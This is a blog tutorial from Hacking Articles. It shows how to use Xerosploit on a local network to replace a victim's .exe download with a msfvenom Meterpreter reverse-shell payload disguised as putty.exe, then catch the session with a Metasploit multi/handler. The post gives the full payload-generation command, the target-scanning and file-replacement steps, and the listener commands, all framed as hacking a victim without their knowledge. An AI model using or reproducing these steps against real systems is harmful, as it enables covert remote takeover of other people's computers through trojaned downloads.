In this article we will learn about that how we can change an on-going downloading file with your metasploit’s payload in your victim’s PC. That means if your victim is about to download an .exe file then you can change it with your payload (.exe). Hence hacking the victim without his/her knowing.
We will achieve the said with the help of Xerosploit. To know all about Xerosploit click here but first we will make you payload using msfvenom.
Now make your msfvenom payload. Here, we have made a payload named putty as we have taken putty as an example for our practical:
Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.121 lport=8443 –f exe > /root/Desktop/putty.exe
Once your payload is created, save it on your desktop and open Xerosploit in the terminal of your kali and type Xerosploit to run it.
Once Xerosploit starts, type help command for that it will show all the basic commands to you. And then type scan and press enter so that you can see all the IP addresses in your network.
Once Xerosploit starts, type help command for that it will show all the basic commands to you. And then type scan and press enter so that you can see all the IP addresses in your network.
Choose you target and type its IP, so that now it has been targeted. Then again type help to see all the command your can now use.
Now type rdownload as it will help us to achieve our goal. After typing rdownload it will ask you to type run, therefore, type run next.
In the next step it will ask you to give the extension of files which you want to replace. For example we have taken .exe extension as we want to replace all the exe files that victim will download.
Then it will ask you to give it the path of the file which will replace victim’s file. For instance our payload’s name was putty.exe and it was reserved on Desktop so we gave path: /root/Desktop/putty.exe
After giving the path, simply press enter
Now you can see that as our victim is trying to download putty but instead our payload will be downloaded. Thus, the victim will be hacked.
Now that downloading of putty is started, it is asking us to save the downloaded file (which, for victim, is putty as he/she desired to download) and so he/she will obviously save the file.
Now that the victim’s part is done, we will open metasploit through our terminal and use multi/handler exploit to obtain the session.
Therefore, open metasploit by typing msfconsole on your terminal of kali and type:
msf exploit(handler)>use exploit/multi/handler
msf exploit(handler)>set payload windows/meterpreter/reverse_tcp
msf exploit(handler)>set lhost 192.168.1.121
msf exploit(handler)>set lport 8443
msf exploit(handler)>exploit
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.
The post A New Way to Hack Remote PC using Xerosploit and Metasploit appeared first on Hacking Articles.